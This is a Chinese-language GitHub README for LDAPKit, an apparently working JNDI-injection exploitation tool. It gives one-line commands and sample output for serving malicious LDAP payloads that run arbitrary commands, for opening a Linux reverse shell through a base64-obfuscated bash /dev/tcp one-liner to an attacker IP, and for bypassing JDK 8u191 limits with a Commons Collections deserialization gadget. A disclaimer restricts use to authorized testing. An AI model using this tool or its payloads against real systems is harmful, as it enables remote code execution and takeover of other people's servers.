LDAPKit

工具仅用于安全研究以及内部自查，禁止使用工具发起非法攻击，造成的后果使用者负责

基本使用

无需自行编译Java文件和开启HTTP服务，一切自动

只要一行：java -jar LDAPKit.jar --cmd [命令]

例如：java -jar LDAPKit.jar --cmd notepad.exe

注意：如果直接java -jar LDAPKit.jar默认命令是calc.exe弹计算器

    ___  ________   ________  ___  ___  __    ___  _________   
   |\  \|\   ___  \|\   ___ \|\  \|\  \|\  \ |\  \|\___   ___\ 
   \ \  \ \  \\ \  \ \  \_|\ \ \  \ \  \/  /|\ \  \|___ \  \_| 
 __ \ \  \ \  \\ \  \ \  \ \\ \ \  \ \   ___  \ \  \   \ \  \  
|\  \\_\  \ \  \\ \  \ \  \_\\ \ \  \ \  \\ \  \ \  \   \ \  \ 
\ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\   \ \__\
 \|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__|    \|__|
11:32:56 [INFO] [org.sec.Main] start jndi kit
11:32:56 [INFO] [org.sec.Main] cmd: notepad.exe
11:32:56 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000
11:32:56 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389
|--------------------------------------------------------|
|------Payload: ldap://127.0.0.1:1389/badClassName-------|
|--------------------------------------------------------|

然后就可以测试各种漏洞了

反弹shell

加入了针对Linux的反弹shell功能，未测试

命令：java -jar LDAPKit.jar --reverse IP:PORT

例如：java -jar LDAPKit.jar --reverse 192.168.0.1:8080

    ___  ________   ________  ___  ___  __    ___  _________   
   |\  \|\   ___  \|\   ___ \|\  \|\  \|\  \ |\  \|\___   ___\ 
   \ \  \ \  \\ \  \ \  \_|\ \ \  \ \  \/  /|\ \  \|___ \  \_| 
 __ \ \  \ \  \\ \  \ \  \ \\ \ \  \ \   ___  \ \  \   \ \  \  
|\  \\_\  \ \  \\ \  \ \  \_\\ \ \  \ \  \\ \  \ \  \   \ \  \ 
\ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\   \ \__\
 \|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__|    \|__|
10:46:04 [INFO] [org.sec.Main] start jndi kit
10:46:04 [INFO] [org.sec.Main] use reverse shell
10:46:04 [INFO] [org.sec.Main] ignore command input
10:46:04 [INFO] [org.sec.Main] cmd: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS84MDgwIDA+JjE=}|{base64,-d}|{bash,-i}
10:46:04 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000
10:46:04 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389
|--------------------------------------------------------|
|------Payload: ldap://127.0.0.1:1389/badClassName-------|
|--------------------------------------------------------|

然后就可以测试各种漏洞了

Bypass JDK 8u191

可以绕过高版限制，利用本地gadget触发反序列化漏洞造成RCE

命令：java -jar LDAPKit.jar --cmd [命令] --cc

例如：java -jar LDAPKit.jar --cmd calc.exe --cc

    ___  ________   ________  ___  ___  __    ___  _________   
   |\  \|\   ___  \|\   ___ \|\  \|\  \|\  \ |\  \|\___   ___\ 
   \ \  \ \  \\ \  \ \  \_|\ \ \  \ \  \/  /|\ \  \|___ \  \_| 
 __ \ \  \ \  \\ \  \ \  \ \\ \ \  \ \   ___  \ \  \   \ \  \  
|\  \\_\  \ \  \\ \  \ \  \_\\ \ \  \ \  \\ \  \ \  \   \ \  \ 
\ \________\ \__\\ \__\ \_______\ \__\ \__\\ \__\ \__\   \ \__\
 \|________|\|__| \|__|\|_______|\|__|\|__| \|__|\|__|    \|__|
11:08:25 [INFO] [org.sec.Main] start jndi kit
11:08:25 [INFO] [org.sec.Main] cmd: calc.exe
11:08:25 [INFO] [org.sec.Http] start http server: 0.0.0.0:8000
11:08:25 [INFO] [org.sec.Ldap] use commons collections 6 payload
11:08:25 [INFO] [org.sec.Ldap] start ldap server: 0.0.0.0:1389
|--------------------------------------------------------|
|------Payload: ldap://127.0.0.1:1389/badClassName-------|
|--------------------------------------------------------|

然后就可以测试各种漏洞了

下载地址

免责申明

未经授权许可使用LDAPKit攻击目标是非法的

本程序应仅用于授权的安全测试与研究目的

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
src/main		src/main
.gitattributes		.gitattributes
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
pom.xml		pom.xml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

LDAPKit

基本使用

反弹shell

Bypass JDK 8u191

免责申明

About

Releases

Packages

Languages

License

Lance621/LDAPKit

Folders and files

Latest commit

History

Repository files navigation

LDAPKit

基本使用

反弹shell

Bypass JDK 8u191

免责申明

About

Resources

License

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages